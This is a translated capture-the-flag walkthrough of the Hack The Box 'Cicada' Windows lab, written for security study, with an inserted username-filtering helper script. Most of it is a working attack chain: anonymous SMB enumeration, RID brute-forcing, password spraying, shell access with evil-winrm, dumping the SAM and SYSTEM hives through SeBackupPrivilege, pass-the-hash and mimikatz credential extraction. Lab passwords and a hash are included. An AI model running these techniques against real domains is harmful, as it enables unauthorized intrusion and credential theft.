This article is intended solely for cybersecurity research and study; do not use the techniques described here for illegal activities.
Hack The Box is an overseas online lab platform; its lab environment is updated continuously and lets you test your penetration-testing skills.
Key points: SMB RID enumeration
Kali: 10.10.16.3
Cicada: 10.10.11.35
0001. Obtaining access to the system
Scan the target with nmap. The set of open ports indicates a Windows host, and the Host script results show that SMB is enabled.
nmap -sC -sV -O -oN nmap.txt 10.10.11.35
# Nmap 7.94SVN scan initiated Mon Sep 30 22:17:34 2024 as: nmap -sC -sV -O -oN nmap.txt 10.10.11.35
Nmap scan report for 10.10.11.35 (10.10.11.35)
Host is up (0.55s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-01 09:18:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-01T09:19:30
|_ start_date: N/A
|_clock-skew: 6h59m59s
Next, check SMB for usable information. With an empty password we can list the shares; the ones that might hold something useful are DEV and HR.
smbclient -L //10.10.11.35
DEV gives no access, but in HR we find the file "Notice from HR.txt". After downloading it we find the initial default password: Cicada$M6Corpb*@Lp#nZp!8
smbclient //10.10.11.35/HR
dir
get "Notice from HR.txt"
cat "Notice from HR.txt"
With the initial password in hand, we collect usernames by enumerating RIDs over SMB:
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute
The first few lines are built-in system accounts and can be ignored; save the remaining lines to users.txt and use the following command to filter the usernames into usernames.txt (the lookbehind matches the literal "CICADA\" domain prefix, the lookahead the " (" before the SID type).
grep -oP '(?<=CICADA\\).+(?= \()' users.txt > usernames.txt
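A more robust version of the grep filter above, as an added example that is not part of the original write-up: it keeps only SidTypeUser entries, skips the well-known RIDs below 1000 and machine accounts ending in "$", so groups such as "Domain Admins" and the DC's own account never end up in the spray list. The sample output is constructed to mimic crackmapexec's --rid-brute format; the RIDs are made up.

```shell
# Constructed sample of crackmapexec --rid-brute output (RIDs are made up;
# user names are the ones that appear in the write-up).
sample_rid_brute() {
    cat <<'EOF'
SMB  10.10.11.35  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1101: CICADA\Dev Support (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1104: CICADA\michael.wrightson (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1108: CICADA\david.orelious (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1601: CICADA\emily.oscars (SidTypeUser)
EOF
}

# extract_users: read --rid-brute output on stdin (or from the files given as
# arguments) and print one account name per line.
#   - only lines tagged (SidTypeUser) are considered (groups/aliases are dropped)
#   - RIDs below 1000 are the built-in accounts (Administrator, Guest, krbtgt)
#   - names ending in "$" are computer accounts, not people
extract_users() {
    awk '
        /\(SidTypeUser\)/ {
            for (i = 1; i < NF; i++) {
                # the RID field looks like "1104:"
                if ($i ~ /^[0-9]+:$/) {
                    rid  = substr($i, 1, length($i) - 1) + 0
                    acct = $(i + 1)
                    sub(/^.*\\/, "", acct)          # strip the DOMAIN\ prefix
                    if (rid >= 1000 && acct !~ /\$$/) print acct
                    break
                }
            }
        }' "$@"
}

# Usage: feed the saved crackmapexec output through the filter.
sample_rid_brute | extract_users
```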
Now that we have usernames and a password, we try them in turn; the LDAP check confirms that the password works for the michael.wrightson account.
crackmapexec ldap cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
Using those credentials we pull the user information and obtain the password for david.orelious: aRt$Lp#7t*VQ!3
crackmapexec ldap cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
After some trial we find that david.orelious can access the dev share over SMB, where we find Backup_script.ps1; opening it reveals the password for emily.oscars: Q!3@Lp#M6b*7t*Vt
smbclient -U david.orelious //10.10.11.35/dev
dir
get Backup_script.ps1
cat Backup_script.ps1
Log in remotely with evil-winrm to get a shell on the system.
evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
0002. Escalating to Administrator
First check the privileges held by the current user: it has the SeBackupPrivilege privilege.
whoami /all
This privilege grants the user full read access to the file system, including the SAM and SYSTEM registry hives; from these two files the password hashes of highly privileged accounts on the system or network can be recovered for privilege escalation. The steps are as follows:
a. Save the registry hives and download them
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
download sam
download system
b. Extract the hashes
impacket-secretsdump -sam sam -system system local
Log in remotely with the recovered NT hash to obtain Administrator privileges.
evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.10.11.35
Uploading mimikatz.exe also lets us recover the Administrator password; Kali ships mimikatz.exe at /usr/share/windows-resources/mimikatz/x64/mimikatz.exe.
upload mimikatz.exe
./mimikatz.exe "sekurlsa::logonpasswords" exit
Thanks for reading!
Originally published on the WeChat public account (Rsec): HTB Lab Cicada (Windows) [Easy]